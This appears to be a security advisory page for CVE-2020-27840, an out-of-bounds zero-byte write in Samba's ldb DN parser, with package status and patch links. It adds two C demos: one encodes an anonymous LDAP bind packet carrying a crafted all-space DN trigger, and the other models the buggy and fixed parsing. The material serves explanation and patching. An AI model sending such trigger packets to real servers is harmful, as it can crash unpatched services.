Related Vulnerabilities: CVE-2020-27840  

Severity: Medium

Remote: Yes

Type: Arbitrary code execution

Description

A security issue has been found in Samba before version 4.14.2. A DN may be represented in string form with arbitrary amounts of space around the component values. These spaces are supposed to be ignored, but invalid DN strings with spaces may instead cause a zero byte to be written into out-of-bounds memory.

An LDAP bind request can send a string DN as a username. This DN is necessarily parsed before the password is checked, so an attacker without real credentials can anonymously trigger this bug.
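What that unauthenticated trigger looks like on the wire, as an added example (not Samba's code and not from the advisory): a minimal BER encoder for an RFC 4511 simple BindRequest, plus the reverse walk a server performs to reach the name field. The DN `cn=   ,dc=example` (a value consisting only of spaces) and the password `x` are constructed inputs chosen to show that the name is a plain OCTET STRING the server must decode and parse as a DN before the password is ever compared.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Write a BER definite-form length; returns bytes used, 0 if no room / too large. */
static size_t ber_put_len(unsigned char *out, size_t cap, size_t len)
{
    if (len < 0x80)   { if (cap < 1) return 0; out[0] = (unsigned char)len; return 1; }
    if (len <= 0xFF)  { if (cap < 2) return 0; out[0] = 0x81; out[1] = (unsigned char)len; return 2; }
    if (len <= 0xFFFF){ if (cap < 3) return 0; out[0] = 0x82;
                        out[1] = (unsigned char)(len >> 8); out[2] = (unsigned char)(len & 0xFF); return 3; }
    return 0;
}

/* Write tag + length + payload; returns total bytes, 0 on overflow. */
static size_t ber_put_tlv(unsigned char *out, size_t cap, unsigned char tag,
                          const unsigned char *data, size_t len)
{
    unsigned char lenbuf[3];
    size_t ln = ber_put_len(lenbuf, sizeof lenbuf, len);
    if (ln == 0 || cap < 1 + ln + len) return 0;
    out[0] = tag;
    memcpy(out + 1, lenbuf, ln);
    if (len) memcpy(out + 1 + ln, data, len);
    return 1 + ln + len;
}

/* LDAPMessage ::= SEQUENCE { messageID INTEGER,
 *     [APPLICATION 0] BindRequest { version 3, name OCTET STRING, simple [0] OCTET STRING } }
 * messageID limited to 1..127 to keep the INTEGER encoding to one byte.
 * Returns encoded size, 0 on error. */
static size_t build_simple_bind(int msgid, const char *dn, const char *password,
                                unsigned char *out, size_t cap)
{
    unsigned char body[1024], req[1032], one[1];
    size_t n = 0, r = 0, m;
    if (msgid < 1 || msgid > 127) return 0;

    one[0] = 3;                                     /* LDAP version 3 */
    m = ber_put_tlv(body + n, sizeof body - n, 0x02, one, 1);                      if (!m) return 0; n += m;
    m = ber_put_tlv(body + n, sizeof body - n, 0x04,                               /* name = the DN string */
                    (const unsigned char *)dn, strlen(dn));                       if (!m) return 0; n += m;
    m = ber_put_tlv(body + n, sizeof body - n, 0x80,                               /* simple [0] password */
                    (const unsigned char *)password, strlen(password));           if (!m) return 0; n += m;

    one[0] = (unsigned char)msgid;
    m = ber_put_tlv(req + r, sizeof req - r, 0x02, one, 1);                        if (!m) return 0; r += m;
    m = ber_put_tlv(req + r, sizeof req - r, 0x60, body, n);                       if (!m) return 0; r += m;
    return ber_put_tlv(out, cap, 0x30, req, r);
}

/* Server-side view: walk the message up to the name field and copy it out, without
 * looking at the password at all.  Short-form lengths only (each element < 128 bytes),
 * which covers this demo.  Returns the DN length or -1 on malformed input. */
static int bind_dn_from_message(const unsigned char *msg, size_t len, char *dn, size_t cap)
{
    size_t i = 0, n;
    if (len < 2 || msg[i++] != 0x30 || msg[i++] >= 0x80) return -1;   /* LDAPMessage  */
    if (i + 2 > len || msg[i++] != 0x02 || msg[i] >= 0x80) return -1; /* messageID    */
    i += 1 + msg[i];
    if (i + 2 > len || msg[i++] != 0x60 || msg[i++] >= 0x80) return -1; /* BindRequest */
    if (i + 2 > len || msg[i++] != 0x02 || msg[i] >= 0x80) return -1; /* version      */
    i += 1 + msg[i];
    if (i + 2 > len || msg[i++] != 0x04 || msg[i] >= 0x80) return -1; /* name         */
    n = msg[i++];
    if (i + n > len || n >= cap) return -1;
    memcpy(dn, msg + i, n);
    dn[n] = '\0';
    return (int)n;
}

int main(void)
{
    unsigned char out[256];
    char dn[128];
    /* Constructed trigger: an all-space RDN value; no valid credential is needed. */
    size_t n = build_simple_bind(1, "cn=   ,dc=example", "x", out, sizeof out);
    for (size_t i = 0; i < n; i++) printf("%02x%s", out[i], (i + 1) % 16 ? " " : "\n");
    printf("\nname field as the server sees it before any password check: \"%s\"\n",
           bind_dn_from_message(out, n, dn, sizeof dn) >= 0 ? dn : "(malformed)");
    return 0;
}
```

The same bytes could be sent to port 389 with any raw TCP client; nothing in the message commits the client to a real account, which is why the advisory classes this path as anonymous.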

The location of the zero byte is a negative offset relative to the location of a dynamically allocated heap buffer; the exact offset depends on the DN string. While it is possible for an attacker to cause non-fatal data corruption, usefully targeting this is likely to be difficult and the most likely outcome is a crash.

The affected parsing routine is widely used. LDAP bind is not the only way to trigger the bug remotely, though it appears to be the only unauthenticated method.
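To make the "zero byte at a negative offset" concrete, here is an added example that models the bug class described above (space trimming during DN component parsing) in a standalone C parser. It is a constructed illustration written for this page, not ldb's or Samba's code, and the details of how the real routine miscounted are not reproduced. The value buffer is placed after a run of 0xAA guard bytes inside one array, so the out-of-bounds write lands somewhere observable instead of in unrelated heap memory. The `hardened` flag switches between the faulty rewind logic and the corrected one.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define GUARD_LEN 32   /* bytes that sit in memory just before the value buffer */
#define VALUE_MAX 32

/* One parsed DN value.  'storage' holds GUARD_LEN guard bytes (0xAA) followed by the
 * value buffer, so a '\0' written at a negative offset from the value lands in the
 * guard where it can be checked, rather than in whatever precedes a heap allocation. */
struct dn_value {
    unsigned char storage[GUARD_LEN + VALUE_MAX];
    long nul_offset;       /* offset from the value buffer at which '\0' was written */
};

static char *value_start(struct dn_value *v) { return (char *)v->storage + GUARD_LEN; }
static const char *parsed_value(struct dn_value *v) { return value_start(v); }

static bool guard_intact(const struct dn_value *v)
{
    for (size_t i = 0; i < GUARD_LEN; i++)
        if (v->storage[i] != 0xAA) return false;
    return true;
}

/* Copy a component value (p points just after '=') into out, stopping at ',' or NUL,
 * skipping leading spaces and trimming trailing ones.  Returns p at the terminator.
 * hardened=false models the bug class: the rewind count 'l' also includes leading
 * spaces that were skipped and never written, so when the value is nothing but spaces
 * the terminating '\0' is written before the start of the buffer.  The offset is
 * -(number of spaces), i.e. it depends on the DN string, as the advisory says. */
static const char *parse_value(const char *p, struct dn_value *out, bool hardened)
{
    memset(out->storage, 0xAA, GUARD_LEN);
    memset(out->storage + GUARD_LEN, 0, VALUE_MAX);
    char *start = value_start(out);
    char *d = start;          /* write cursor */
    size_t l = 0;             /* length of the current run of trailing spaces */
    bool trim = true;         /* still inside the leading-space run */

    for (; *p != '\0' && *p != ','; p++) {
        if (trim && *p == ' ') {
            if (!hardened) l++;       /* BUG: counted although nothing was written */
            continue;
        }
        trim = false;
        if ((size_t)(d - start) >= VALUE_MAX - 1)
            break;                    /* demo buffer full; real code would allocate */
        *d++ = *p;
        l = (*p == ' ') ? l + 1 : 0;  /* spaces are copied provisionally, non-space resets */
    }
    /* Hardened: in addition to not counting skipped bytes, never rewind past what was
     * actually written.  This check alone would have turned the bug into a no-op. */
    if (hardened && l > (size_t)(d - start))
        l = (size_t)(d - start);
    char *term = d - l;
    out->nul_offset = (long)(term - start);
    *term = '\0';                     /* the zero byte the advisory describes */
    return p;
}

/* Parse one "attr=value" component.  Returns a pointer to the ',' or NUL that ended
 * it, or NULL if there is no '='.  attr receives the name with surrounding spaces removed. */
static const char *parse_component(const char *in, char *attr, size_t attrsz,
                                   struct dn_value *out, bool hardened)
{
    const char *eq = strchr(in, '=');
    if (eq == NULL || attrsz == 0) return NULL;
    while (*in == ' ') in++;
    const char *end = eq;
    while (end > in && end[-1] == ' ') end--;
    size_t n = (size_t)(end - in);
    if (n >= attrsz) n = attrsz - 1;
    memcpy(attr, in, n);
    attr[n] = '\0';
    return parse_value(eq + 1, out, hardened);
}

int main(void)
{
    /* Constructed inputs: a well-formed component and an all-space value. */
    const char *inputs[] = { "cn = Sam Ba  ,dc=example", "cn=   ,dc=example" };
    for (int h = 0; h < 2; h++)
        for (int k = 0; k < 2; k++) {
            struct dn_value v; char attr[16];
            parse_component(inputs[k], attr, sizeof attr, &v, h == 1);
            printf("%-9s %-28s attr=%s value=\"%s\" nul_offset=%ld guard=%s\n",
                   h ? "hardened" : "naive", inputs[k], attr, parsed_value(&v),
                   v.nul_offset, guard_intact(&v) ? "intact" : "CORRUPTED");
        }
    return 0;
}
```

The naive run on the all-space value reports `nul_offset=-3` and a corrupted guard; the hardened run reports offset 0 and an empty value. In the real service the bytes before the allocation are heap metadata or a neighbouring object, which is why the practical result is a crash rather than a controllable write.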

Group    Package  Affected   Severity  Status
AVG-1734 ldb      1:2.2.0-3  Medium    Vulnerable
AVG-1732 samba    4.14.0-2   Medium    Vulnerable

https://www.samba.org/samba/security/CVE-2020-27840.html
https://bugzilla.samba.org/show_bug.cgi?id=14595
https://www.samba.org/samba/ftp/patches/security/samba-4.14.0-security-2021-03-24.patch
https://git.samba.org/samba.git/?p=samba.git;a=commitdiff;h=c82bea2b723b55dca626fad9f9478d89c90cfd10
https://git.samba.org/samba.git/?p=samba.git;a=commitdiff;h=f89767bea7330ec1936d2312e2b1da7b435c04b7
https://git.samba.org/samba.git/?p=samba.git;a=commitdiff;h=2d82f0e1b84bb390dbf6a3547e4234bfec4eac21